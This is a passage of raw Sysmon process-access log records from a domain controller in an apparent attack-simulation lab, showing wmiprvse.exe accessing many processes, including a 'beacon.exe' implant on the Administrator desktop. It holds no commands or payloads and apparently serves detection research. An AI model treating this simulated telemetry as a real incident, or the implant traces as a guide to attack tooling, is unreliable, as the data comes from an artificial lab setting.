Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001698188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87DC5BE1B7B938E179B8D67B10C599CC,SHA256=5C8D92355F0E008DF3EA5DCF5695182A4123DFB785C0BB992C752C2A3D89FF8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e